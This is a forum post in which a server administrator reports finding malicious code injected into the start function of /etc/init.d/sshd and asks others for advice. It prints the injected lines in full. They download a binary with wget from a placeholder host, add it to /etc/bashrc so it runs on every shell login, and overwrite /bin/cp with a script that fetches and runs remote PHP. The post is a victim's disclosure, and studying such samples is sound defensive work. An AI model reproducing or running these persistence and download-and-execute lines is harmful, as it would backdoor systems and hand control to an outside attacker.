Hi guys
today i detect some weird lines in /etc/init.d/sshd at the start function, this is the content
today i detect some weird lines in /etc/init.d/sshd at the start function, this is the content
Code:
start()
{
[ -x $SSHD ] || exit 5
[ -f /etc/ssh/sshd_config ] || exit 6
# Create keys if necessary
if [ "x${AUTOCREATE_SERVER_KEYS}" != xNO ]; then
do_rsa_keygen
if [ "x${AUTOCREATE_SERVER_KEYS}" != xRSAONLY ]; then
do_rsa1_keygen
do_dsa_keygen
fi
fi
Inject='/etc/bashrc' #/etc/bashrc
Bar='/bin/bar' #/bin/bar
if [[ ! -a $Bar ]]; then
wget http://example.com/Dynamic/g/bar >/dev/null 2>&1
chmod 755 bar >/dev/null 2>&1
mv bar $Bar >/dev/null 2>&1
fi;
if ! grep -q $Bar $Inject; then
echo -e "$Bar >/dev/null 2>&1" >> $Inject
fi;
if [[ ! grep -q "example.com" /bin/cp ]]; then
cp /bin/cp /bin/copy >/dev/null 2>&1
echo -e '#!/bin/sh\r\nwget http://example.com/Dynamic/g/run.txt >/dev/null 2>&1\r\nmv run.txt run.php\r\nchmod +x run.php\r\nph
p run.php\r\nrm -rf run.php >/dev/null 2>&1' > /bin/cp
chmod 755 /bin/cp
fi;
Now the content of /bin/cp is
#!/bin/bash
Inject="/etc/bashrc" #/etc/bashrc
Bar="/bin/bar" #/bin/bar
if [[ ! -a $Bar ]]; then
wget http://example.com/Dynamic/g/bar >/dev/null 2>&1
chmod 755 bar >/dev/null 2>&1
mv bar $Bar >/dev/null 2>&1
fi;
if ! grep -q "$Bar" $Inject; then
echo -e "\n$Bar >/dev/null 2>&1" >> $Inject
fi;
copy
Have any of you experienced this?
Checking this URL http://example.com/Dynamic/g/run.txt
looks like a very dangerous code, now i have to research for the way it happened.
Any advice or comment?
Last edited by a moderator: